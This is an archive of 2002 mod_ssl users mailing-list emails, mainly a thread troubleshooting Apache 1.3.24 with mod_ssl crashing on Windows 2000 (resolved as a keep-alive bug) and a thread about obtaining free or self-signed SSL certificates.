	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello,
I'm running Apache 1.3.24 with MOD_SSL 2.8.8 on a Windows 2000 server.

I've installed and configured according to the "Apache + SSL on Win32 =
Howto"  and I've =
gotten a certificate from Thawte. I can and always have been able to =
make an (unsecure) http hit on the server. I can also make a secure =
https hit. However, if I reload the secure page a few times, sooner or =
later Apache crashes.

The error message that pops up says "Apache.exe has generated errors and =
will be closed by Windows. You will need to restart the program. An =
error log is being created." The Windows error log says it was an access =
violation and gives a stack dump, which I don't know how to read. The =
Apache error log and the SSL log are free of errors.

When starting Apache, the only complaint I was getting from the config =
file was:
"Cannot add module via name 'mod_ssl.c': not in list of loaded modules"
so I've commented that line out.

Does anyone have any suggestions?


These are the relevant lines in httpd.conf:

 ### (other AddModules) ###
#AddModule mod_ssl.c
...

 ### (other LoadModules) ###
LoadModule ssl_module modules/mod_ssl.so
...

Listen 80
Listen 443
...

SSLMutex sem
SSLRandomSeed startup builtin
SSLSessionCache none

SSLLog logs/SSL.log
SSLLogLevel info


DocumentRoot c:/...
ServerName www.mydomain.com

...

 ### (many other VirtualHosts) ###


SSLEngine On
SSLCertificateFile conf/ssl/pubkey.cert
SSLCertificateKeyFile conf/ssl/prvkey.key
DocumentRoot c:/...
ServerName www.mydomain.com



-------------------------------------------------
Mike Campbell          Aktiv Software Corporation
mcampbell@aktiv.com          http://www.aktiv.com
(250) 708-0027


------=_NextPart_000_0061_01C20260.9590DC90
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello,
I'm running Apache 1.3.24 =
with MOD_SSL=20
2.8.8 on a Windows 2000 server.


 


I've installed and configured according =
to the=20
"Apache + SSL on Win32 Howto" <http://tud.at=
/programm/apache-ssl-win32-howto.php3>=20
and I've gotten a certificate from Thawte. I can and always have been =
able to=20
make an (unsecure) http hit on the server. I can also make a secure =
https hit.=20
However, if I reload the secure page a few times, sooner or later Apache =

crashes.


 


The error message that pops up says =
"Apache.exe has=20
generated errors and will be closed by Windows. You will need to restart =
the=20
program. An error log is being created." The Windows error log says it =
was an=20
access violation and gives a stack dump, which I don't know how to read. =
The=20
Apache error log and the SSL log are free of errors.


 


When starting Apache, the only =
complaint I was=20
getting from the config file was:
"Cannot add module via name =
'mod_ssl.c':=20
not in list of loaded modules"
so I've commented that line =
out.


 


Does anyone have any =
suggestions?


 


 


These are the relevant lines in=20
httpd.conf:



 ### (other AddModules) =
###
#AddModule=20
mod_ssl.c
...


 


 ### (other LoadModules) ###
LoadModule ssl_module=20
modules/mod_ssl.so
...


 


Listen 80
Listen 443
...


 


SSLMutex sem
SSLRandomSeed startup builtin
SSLSessionCache =
none


 


SSLLog logs/SSL.log
SSLLogLevel info


 


<VirtualHost XXX.XXX.XXX.XXX:80>
DocumentRoot =
c:/...
ServerName=20
www.mydomain.com
</VirtualHost=
>
...


 


 ### (many other VirtualHosts) ###


 


<VirtualHost XXX.XXX.XXX.XXX:443>
SSLEngine=20
On
SSLCertificateFile conf/ssl/pubkey.cert
SSLCertificateKeyFile=20
conf/ssl/prvkey.key
DocumentRoot c:/...
ServerName www.mydomain.com
</VirtualHost=
>


 


 


-------------------------------------------------
Mike=20
Campbell          Aktiv =
Software=20
Corporation
mcampbell@aktiv.com  &n=
bsp;      =20
http://www.aktiv.com
(250)=20
708-0027


------=_NextPart_000_0061_01C20260.9590DC90--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 05:50:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA06177; Fri, 24 May 2002 05:49:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.pcs.loc id FAA06136; Fri, 24 May 2002 05:48:37 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: security
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Thu, 23 May 2002 16:43:56 -0500
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Thread-Topic: security
Thread-Index: AcIChX3nVBMNf0lVSLmuciNt/nldyQAHDCOQ
From: "Woodraska, Robert J." 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id FAA06167
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Woodraska, Robert J." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Tony.  I didn't know about this.  The one question I would have
is about the "limited ubiquity" to use their terms.  Does this mean you
still have to load a certificate into your browser to show freessl as a
cert authority to veriy the cert that they give you?  Or do they base
theirs on one of the "universal" CA's like Verisign, Thawte, etc.?

-----Original Message-----
From: Tony Villasenor [mailto:tony@villasenor.org]
Sent: Thursday, May 23, 2002 12:58 PM
To: modssl-users@modssl.org
Subject: RE: security



http://www.freessl.com/


On Thu, 23 May 2002, Woodraska, Robert J. wrote:

> I have never heard of a free CA.  You can create your own certificates
> and fake CA using the SnakeOil method/docs, and users would have to
> accept your certificate, but I don't think there are any CA's with
> certificates already built in to the browsers that will just give you
a
> certificate.
> 
> -----Original Message-----
> From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
> Sent: Thursday, May 23, 2002 12:35 PM
> To: modssl-users@modssl.org
> Subject: RES: security
> 
> 
> I have linux apache mo0d_ssl and openssl i would like toknow a free ca
> to get a certificate anyone knows?
> 
> > ----- Mensagem original -----
> > De:		Angelo Marcos Rigo 
> > Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> > Para:		modssl-users@modssl.org
> > Assunto:		security
> > 
> > Hi 
> > 
> > I would like to have a secure website
> > ghow can i do that?
> > 
> >
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > User Support Mailing List
modssl-users@modssl.org
> > Automated List Manager
majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 05:50:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA06207; Fri, 24 May 2002 05:49:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.pcs.loc id FAA06140; Fri, 24 May 2002 05:48:39 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: security
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Thu, 23 May 2002 16:51:11 -0500
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Thread-Topic: security
Thread-Index: AcIChXxkFKsHYlG7QnSS8WqeDkDUiAAAB9YgAAeOCHA=
From: "Woodraska, Robert J." 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id FAB06167
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Woodraska, Robert J." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry Angelo, I replied to fast.  Read on
http://www.modssl.org/docs/2.8/ssl_faq.html under the certificate
section.  It talks about dummy CA's and making your own self-signed
certs.

-----Original Message-----
From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
Sent: Thursday, May 23, 2002 1:14 PM
To: modssl-users@modssl.org
Subject: RES: security


thank´s a lot!!

> ----- Mensagem original -----
> De:		Tony Villasenor [SMTP:tony@villasenor.org]
> Enviada em:		quinta-feira, 23 de maio de 2002 14:58
> Para:		modssl-users@modssl.org
> Assunto:		RE: security
> 
> 
> http://www.freessl.com/
> 
> 
> On Thu, 23 May 2002, Woodraska, Robert J. wrote:
> 
> > I have never heard of a free CA.  You can create your own
> certificates
> > and fake CA using the SnakeOil method/docs, and users would have to
> > accept your certificate, but I don't think there are any CA's with
> > certificates already built in to the browsers that will just give
> you a
> > certificate.
> > 
> > -----Original Message-----
> > From: Angelo Marcos Rigo [mailto:angelo@colegioanchieta.g12.br]
> > Sent: Thursday, May 23, 2002 12:35 PM
> > To: modssl-users@modssl.org
> > Subject: RES: security
> > 
> > 
> > I have linux apache mo0d_ssl and openssl i would like toknow a free
> ca
> > to get a certificate anyone knows?
> > 
> > > ----- Mensagem original -----
> > > De:		Angelo Marcos Rigo 
> > > Enviada em:		quinta-feira, 23 de maio de 2002 14:17
> > > Para:		modssl-users@modssl.org
> > > Assunto:		security
> > > 
> > > Hi 
> > > 
> > > I would like to have a secure website
> > > ghow can i do that?
> > > 
> > >
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > > User Support Mailing List
> modssl-users@modssl.org
> > > Automated List Manager
> majordomo@modssl.org
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > User Support Mailing List
> modssl-users@modssl.org
> > Automated List Manager
> majordomo@modssl.org
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
> www.modssl.org
> > User Support Mailing List
> modssl-users@modssl.org
> > Automated List Manager
> majordomo@modssl.org
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 06:35:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA09977; Fri, 24 May 2002 06:34:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id GAA09966; Fri, 24 May 2002 06:34:05 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id AAA08738
	for ; Fri, 24 May 2002 00:34:08 -0400
Date: Fri, 24 May 2002 00:34:08 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Apache + MOD_SSL Win32 crash
In-Reply-To: <006401c2029b$42421a50$3c1f4d18@mikepc>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



What else might be running on this system?  If it were me, I'd move
everything to a solid unix based system.  Widows does not play well with
others, not ready for prime time, but, that's me.

Thanks,

Ron DuFresne

On Thu, 23 May 2002, Mike Campbell wrote:

> Hello,
> I'm running Apache 1.3.24 with MOD_SSL 2.8.8 on a Windows 2000 server.
> 
> I've installed and configured according to the "Apache + SSL on Win32 Howto"  and I've gotten a certificate from Thawte. I can and always have been able to make an (unsecure) http hit on the server. I can also make a secure https hit. However, if I reload the secure page a few times, sooner or later Apache crashes.
> 
> The error message that pops up says "Apache.exe has generated errors and will be closed by Windows. You will need to restart the program. An error log is being created." The Windows error log says it was an access violation and gives a stack dump, which I don't know how to read. The Apache error log and the SSL log are free of errors.
> 
> When starting Apache, the only complaint I was getting from the config file was:
> "Cannot add module via name 'mod_ssl.c': not in list of loaded modules"
> so I've commented that line out.
> 
> Does anyone have any suggestions?
> 
> 
> These are the relevant lines in httpd.conf:
> 
>  ### (other AddModules) ###
> #AddModule mod_ssl.c
> ...
> 
>  ### (other LoadModules) ###
> LoadModule ssl_module modules/mod_ssl.so
> ...
> 
> Listen 80
> Listen 443
> ...
> 
> SSLMutex sem
> SSLRandomSeed startup builtin
> SSLSessionCache none
> 
> SSLLog logs/SSL.log
> SSLLogLevel info
> 
> 
> DocumentRoot c:/...
> ServerName www.mydomain.com
> 
> ...
> 
>  ### (many other VirtualHosts) ###
> 
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/pubkey.cert
> SSLCertificateKeyFile conf/ssl/prvkey.key
> DocumentRoot c:/...
> ServerName www.mydomain.com
> 
> 
> 
> -------------------------------------------------
> Mike Campbell          Aktiv Software Corporation
> mcampbell@aktiv.com          http://www.aktiv.com
> (250) 708-0027
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 08:54:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA17321; Fri, 24 May 2002 08:53:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id IAA17301; Fri, 24 May 2002 08:52:57 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GWLSG100.8FS for ; Fri, 24 May 2002
          07:52:49 +0100 
Message-ID: <3CEDE33D.2030809@itaction.co.uk>
Date: Fri, 24 May 2002 07:52:45 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache + MOD_SSL Win32 crash
References: <006401c2029b$42421a50$3c1f4d18@mikepc>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

That sounds like the ssl mutex mechanism not working properly. Not sure 
whether anyones got it working on win32 and mod_ssl on win32 is still 
listed as an alpha release.

I too would choose to ditch windows, but if you do need it, then you 
should try apache 2 at least the asf say its production quality on win32 
- not sure if there are precompiled win32 binaries with ssl though.

Mike Campbell wrote:

> Hello,
> I'm running Apache 1.3.24 with MOD_SSL 2.8.8 on a Windows 2000 server.
>  
> I've installed and configured according to the "Apache + SSL on Win32 
> Howto"  and I've 
> gotten a certificate from Thawte. I can and always have been able to 
> make an (unsecure) http hit on the server. I can also make a secure 
> https hit. However, if I reload the secure page a few times, sooner or 
> later Apache crashes.
>  
> The error message that pops up says "Apache.exe has generated errors 
> and will be closed by Windows. You will need to restart the program. 
> An error log is being created." The Windows error log says it was an 
> access violation and gives a stack dump, which I don't know how to 
> read. The Apache error log and the SSL log are free of errors.
>  
> When starting Apache, the only complaint I was getting from the config 
> file was:
> "Cannot add module via name 'mod_ssl.c': not in list of loaded modules"
> so I've commented that line out.
>  
> Does anyone have any suggestions?
>  
>  
> These are the relevant lines in httpd.conf:
>
>  ### (other AddModules) ###
> #AddModule mod_ssl.c
> ...
>  
>  ### (other LoadModules) ###
> LoadModule ssl_module modules/mod_ssl.so
> ...
>  
> Listen 80
> Listen 443
> ...
>  
> SSLMutex sem
> SSLRandomSeed startup builtin
> SSLSessionCache none
>  
> SSLLog logs/SSL.log
> SSLLogLevel info
>  
> 
> DocumentRoot c:/...
> ServerName www.mydomain.com 
> 
> ...
>  
>  ### (many other VirtualHosts) ###
>  
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/pubkey.cert
> SSLCertificateKeyFile conf/ssl/prvkey.key
> DocumentRoot c:/...
> ServerName www.mydomain.com 
> 
>  
>  
> -------------------------------------------------
> Mike Campbell          Aktiv Software Corporation
> mcampbell@aktiv.com           
> http://www.aktiv.com
> (250) 708-0027



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 09:46:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA20679; Fri, 24 May 2002 09:45:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp4.cp.tin.it id JAA20641; Fri, 24 May 2002 09:44:53 +0200 (MET DST)
Received: from nakedgun (212.216.36.66) by smtp4.cp.tin.it (6.5.019)
        id 3CE3FA5A000DEF67 for modssl-users@modssl.org; Fri, 24 May 2002 09:44:43 +0200
Message-ID: <005701c202f7$11310c80$4224d8d4@nakedgun>
From: "Enrico Demarin" 
To: 
References: <006401c2029b$42421a50$3c1f4d18@mikepc>
Subject: Re: Apache + MOD_SSL Win32 crash
Date: Fri, 24 May 2002 09:46:08 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0054_01C20307.D45E4F00"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Enrico Demarin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Messaggio in formato MIME composto da piy parti.

------=_NextPart_000_0054_01C20307.D45E4F00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

This (again) sounds like the keep-alive bug :=20

see

http://www.mail-archive.com/modssl-users@modssl.org/msg12969.html

- Enrico
  ----- Original Message -----=20
  From: Mike Campbell=20
  To: modssl-users@modssl.org=20
  Sent: Thursday, May 23, 2002 10:48 PM
  Subject: Apache + MOD_SSL Win32 crash


  Hello,
  I'm running Apache 1.3.24 with MOD_SSL 2.8.8 on a Windows 2000 server.

  I've installed and configured according to the "Apache + SSL on Win32 =
Howto"  and I've =
gotten a certificate from Thawte. I can and always have been able to =
make an (unsecure) http hit on the server. I can also make a secure =
https hit. However, if I reload the secure page a few times, sooner or =
later Apache crashes.

  The error message that pops up says "Apache.exe has generated errors =
and will be closed by Windows. You will need to restart the program. An =
error log is being created." The Windows error log says it was an access =
violation and gives a stack dump, which I don't know how to read. The =
Apache error log and the SSL log are free of errors.

  When starting Apache, the only complaint I was getting from the config =
file was:
  "Cannot add module via name 'mod_ssl.c': not in list of loaded =
modules"
  so I've commented that line out.

  Does anyone have any suggestions?
  =20
  =20
  These are the relevant lines in httpd.conf:

   ### (other AddModules) ###
  #AddModule mod_ssl.c
  ...

   ### (other LoadModules) ###
  LoadModule ssl_module modules/mod_ssl.so
  ...

  Listen 80
  Listen 443
  ...

  SSLMutex sem
  SSLRandomSeed startup builtin
  SSLSessionCache none

  SSLLog logs/SSL.log
  SSLLogLevel info

  
  DocumentRoot c:/...
  ServerName www.mydomain.com
  
  ...

   ### (many other VirtualHosts) ###

  
  SSLEngine On
  SSLCertificateFile conf/ssl/pubkey.cert
  SSLCertificateKeyFile conf/ssl/prvkey.key
  DocumentRoot c:/...
  ServerName www.mydomain.com
  

  =20
  -------------------------------------------------
  Mike Campbell          Aktiv Software Corporation
  mcampbell@aktiv.com          http://www.aktiv.com
  (250) 708-0027


------=_NextPart_000_0054_01C20307.D45E4F00
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









This (again) sounds like the keep-alive bug : =



 


see


 


http://www.mail-archive.com/modssl-users@modssl.org/msg12969.html


 


- Enrico


  
----- Original Message ----- 

  From:=20
  Mike=20
  Campbell 
  
To: modssl-users@modssl.org 

  
Sent: Thursday, May 23, 2002 =
10:48=20
  PM

  
Subject: Apache + MOD_SSL Win32 =

  crash

  


  
Hello,
I'm running Apache 1.3.24 =
with MOD_SSL=20
  2.8.8 on a Windows 2000 server.

  
 

  
I've installed and configured =
according to the=20
  "Apache + SSL on Win32 Howto" <http://tud.at=
/programm/apache-ssl-win32-howto.php3>=20
  and I've gotten a certificate from Thawte. I can and always have been =
able to=20
  make an (unsecure) http hit on the server. I can also make a secure =
https hit.=20
  However, if I reload the secure page a few times, sooner or later =
Apache=20
  crashes.

  
 

  
The error message that pops up says =
"Apache.exe=20
  has generated errors and will be closed by Windows. You will need to =
restart=20
  the program. An error log is being created." The Windows error log =
says it was=20
  an access violation and gives a stack dump, which I don't know how to =
read.=20
  The Apache error log and the SSL log are free of errors.

  
 

  
When starting Apache, the only =
complaint I was=20
  getting from the config file was:
"Cannot add module via name =
'mod_ssl.c':=20
  not in list of loaded modules"
so I've commented that line=20
out.

  
 

  
Does anyone have any =
suggestions?

  
 

  
 

  
These are the relevant lines in=20
  httpd.conf:

  

 ### (other AddModules)=20
  ###
#AddModule mod_ssl.c
...

  
 

  
 ### (other LoadModules) ###
LoadModule ssl_module=20
  modules/mod_ssl.so
...

  
 

  
Listen 80
Listen 443
...

  
 

  
SSLMutex sem
SSLRandomSeed startup builtin
SSLSessionCache=20
  none

  
 

  
SSLLog logs/SSL.log
SSLLogLevel info

  
 

  
<VirtualHost XXX.XXX.XXX.XXX:80>
DocumentRoot=20
  c:/...
ServerName www.mydomain.com
</VirtualHost=
>
...

  
 

  
 ### (many other VirtualHosts) ###

  
 

  
<VirtualHost XXX.XXX.XXX.XXX:443>
SSLEngine=20
  On
SSLCertificateFile conf/ssl/pubkey.cert
SSLCertificateKeyFile =

  conf/ssl/prvkey.key
DocumentRoot c:/...
ServerName www.mydomain.com
</VirtualHost=
>

  
 

  
 

  
-------------------------------------------------
Mike=20
  Campbell          Aktiv =
Software=20
  Corporation
mcampbell@aktiv.com  &n=
bsp;      =20
  http://www.aktiv.com
(250)=20
  708-0027


------=_NextPart_000_0054_01C20307.D45E4F00--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 10:06:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA21679; Fri, 24 May 2002 10:05:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from aktiv.com id KAA21656; Fri, 24 May 2002 10:05:02 +0200 (MET DST)
Received: from mikepc (24.77.31.60) by aktiv.com with ESMTP (Eudora
 Internet Mail Server 3.0.2) for ;
 Fri, 24 May 2002 01:04:52 -0700
Message-ID: <00b601c202f9$da99cce0$3c1f4d18@mikepc>
From: "Mike Campbell" 
To: 
References: <006401c2029b$42421a50$3c1f4d18@mikepc> <005701c202f7$11310c80$4224d8d4@nakedgun>
Subject: Re: Apache + MOD_SSL Win32 crash
Date: Fri, 24 May 2002 01:06:05 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00B3_01C202BF.2E09F9D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Campbell" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00B3_01C202BF.2E09F9D0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Wow, thanks! That solved the problem.
Wasn't expecting such an easy fix. :)

Mike
  ----- Original Message -----=20
  From: Enrico Demarin=20
  To: modssl-users@modssl.org=20
  Sent: Friday, May 24, 2002 12:46 AM
  Subject: Re: Apache + MOD_SSL Win32 crash


  This (again) sounds like the keep-alive bug :=20

  see

  http://www.mail-archive.com/modssl-users@modssl.org/msg12969.html

  - Enrico
    ----- Original Message -----=20
    From: Mike Campbell=20
    To: modssl-users@modssl.org=20
    Sent: Thursday, May 23, 2002 10:48 PM
    Subject: Apache + MOD_SSL Win32 crash


    Hello,
    I'm running Apache 1.3.24 with MOD_SSL 2.8.8 on a Windows 2000 =
server.

    I've installed and configured according to the "Apache + SSL on =
Win32 Howto"  and =
I've gotten a certificate from Thawte. I can and always have been able =
to make an (unsecure) http hit on the server. I can also make a secure =
https hit. However, if I reload the secure page a few times, sooner or =
later Apache crashes.

    The error message that pops up says "Apache.exe has generated errors =
and will be closed by Windows. You will need to restart the program. An =
error log is being created." The Windows error log says it was an access =
violation and gives a stack dump, which I don't know how to read. The =
Apache error log and the SSL log are free of errors.

    When starting Apache, the only complaint I was getting from the =
config file was:
    "Cannot add module via name 'mod_ssl.c': not in list of loaded =
modules"
    so I've commented that line out.

    Does anyone have any suggestions?


    These are the relevant lines in httpd.conf:

     ### (other AddModules) ###
    #AddModule mod_ssl.c
    ...

     ### (other LoadModules) ###
    LoadModule ssl_module modules/mod_ssl.so
    ...

    Listen 80
    Listen 443
    ...

    SSLMutex sem
    SSLRandomSeed startup builtin
    SSLSessionCache none

    SSLLog logs/SSL.log
    SSLLogLevel info

    
    DocumentRoot c:/...
    ServerName www.mydomain.com
    
    ...

     ### (many other VirtualHosts) ###

    
    SSLEngine On
    SSLCertificateFile conf/ssl/pubkey.cert
    SSLCertificateKeyFile conf/ssl/prvkey.key
    DocumentRoot c:/...
    ServerName www.mydomain.com
    


    -------------------------------------------------
    Mike Campbell          Aktiv Software Corporation
    mcampbell@aktiv.com          http://www.aktiv.com
    (250) 708-0027


------=_NextPart_000_00B3_01C202BF.2E09F9D0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Wow, thanks! That solved the =
problem.


Wasn't expecting such an easy fix. =
:)


 


Mike



  
----- Original Message ----- 

  From:=20
  Enrico=20
  Demarin 
  
  
Sent: Friday, May 24, 2002 =
12:46 AM

  
Subject: Re: Apache + MOD_SSL =
Win32=20
  crash

  


  
This (again) sounds like the keep-alive bug : =


  
 

  
see

  
 

  
http://www.mail-archive.com/modssl-users@modssl.org/msg12969.html

  
 

  
- Enrico

  
    
----- Original Message ----- 

    From:=20
    Mike=20
    Campbell 
    
    
Sent: Thursday, May 23, 2002 =
10:48=20
    PM

    
Subject: Apache + MOD_SSL =
Win32=20
    crash

    


    
Hello,
I'm running Apache 1.3.24 =
with=20
    MOD_SSL 2.8.8 on a Windows 2000 server.

    
 

    
I've installed and configured =
according to the=20
    "Apache + SSL on Win32 Howto" <http://tud.at=
/programm/apache-ssl-win32-howto.php3>=20
    and I've gotten a certificate from Thawte. I can and always have =
been able=20
    to make an (unsecure) http hit on the server. I can also make a =
secure https=20
    hit. However, if I reload the secure page a few times, sooner or =
later=20
    Apache crashes.

    
 

    
The error message that pops up says =
"Apache.exe=20
    has generated errors and will be closed by Windows. You will need to =
restart=20
    the program. An error log is being created." The Windows error log =
says it=20
    was an access violation and gives a stack dump, which I don't know =
how to=20
    read. The Apache error log and the SSL log are free of =
errors.

    
 

    
When starting Apache, the only =
complaint I was=20
    getting from the config file was:
"Cannot add module via name=20
    'mod_ssl.c': not in list of loaded modules"
so I've commented =
that line=20
    out.

    
 

    
Does anyone have any =
suggestions?

    
 

    
 

    
These are the relevant lines in=20
    httpd.conf:

    

 ### (other AddModules)=20
    ###
#AddModule mod_ssl.c
...

    
 

    
 ### (other LoadModules) ###
LoadModule ssl_module=20
    modules/mod_ssl.so
...

    
 

    
Listen 80
Listen 443
...

    
 

    
SSLMutex sem
SSLRandomSeed startup =
builtin
SSLSessionCache=20
    none

    
 

    
SSLLog logs/SSL.log
SSLLogLevel info

    
 

    
<VirtualHost XXX.XXX.XXX.XXX:80>
DocumentRoot=20
    c:/...
ServerName www.mydomain.com
</VirtualHost=
>
...

    
 

    
 ### (many other VirtualHosts) ###

    
 

    
<VirtualHost XXX.XXX.XXX.XXX:443>
SSLEngine=20
    On
SSLCertificateFile =
conf/ssl/pubkey.cert
SSLCertificateKeyFile=20
    conf/ssl/prvkey.key
DocumentRoot c:/...
ServerName www.mydomain.com
</VirtualHost=
>

    
 

    
 

    
-------------------------------------------------
Mike=20
    Campbell          Aktiv =

    Software Corporation
mcampbell@aktiv.com  &n=
bsp;      =20
    http://www.aktiv.com
(250)=20
    708-0027


------=_NextPart_000_00B3_01C202BF.2E09F9D0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 24 12:40:16 2002
